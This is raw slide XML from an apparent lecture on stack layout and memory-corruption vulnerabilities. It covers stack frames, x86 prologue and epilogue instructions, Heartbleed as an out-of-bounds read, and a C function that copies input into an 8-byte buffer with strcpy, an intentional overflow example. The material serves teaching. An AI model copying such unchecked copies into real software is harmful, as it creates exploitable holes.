            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The stack is composed of frames </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frames are pushed on the stack as a consequence of function calls (function prologue)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The address of the current frame is stored in the frame pointer register (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each frame contains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function’s actual parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address to jump to at the end of the function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The pointer to the previous frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The function’s local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79316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F42B-A211-369B-15C8-44200F5B9AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Out-of-bounds Read</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB418EDF-5319-1EB7-E66D-719CF2C09BEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Heartbleed Bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CVE-2014-0160</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://heartbleed.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability in the OpenSSL library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusting the size parameter from the user allows for unchecked read into memory (disclosing secrets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Heartbleed Explanation">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D887844-CD67-58F5-53BD-B7DB50910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322" y="1200150"/>
            <a:ext cx="1716758" cy="3659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9A276-2546-6A7B-E782-8BF0964C29B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5677709" y="4881890"/>
            <a:ext cx="1667444" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>xkcd.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>/1354/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2142559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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prologues and Epilogues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before calling a function, the caller prepares the parameters by either setting specific registers or by pushing them on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The prologue of the called function </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pushes the current base pointer on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets the base pointer to be the current stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Moves the stack pointer onward to make room for local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: This is different from the “enter” command, which switches the last two steps (therefore it is not used by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7689655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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Prologues and Epilogues</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The epilogue of the called function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saves the result (if any) in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stores the base pointer into the stack pointer (deletes the current stack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pops a value from the stack, restoring the saved base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executes a ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second and third operations are equivalent to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6152514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en-US"/>
              <a:t>Stack Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991235" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="400050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dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>grows</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991236" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="30861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*str</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991237" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="33147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Return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991238" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="35433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Pointer to previous frame</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991239" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3771900"/>
            <a:ext cx="3429000" cy="4572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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>buffer (8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991240" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="280419" y="1185461"/>
            <a:ext cx="2239615" cy="1077218"/>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600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> buffer[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>}	</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991241" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="28575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2" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="26289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3" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="24003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4" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2306588" y="2514600"/>
            <a:ext cx="457200" cy="11430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991245" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="4057650"/>
            <a:ext cx="0" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991246" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200401" y="2114551"/>
            <a:ext cx="2146591" cy="307777"/>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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xFFFF)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991247" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="4629151"/>
            <a:ext cx="2418964" cy="307777"/>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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x0000)</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="991248" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6784416" y="898130"/>
            <a:ext cx="1595309" cy="2462213"/>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err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>par_str</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
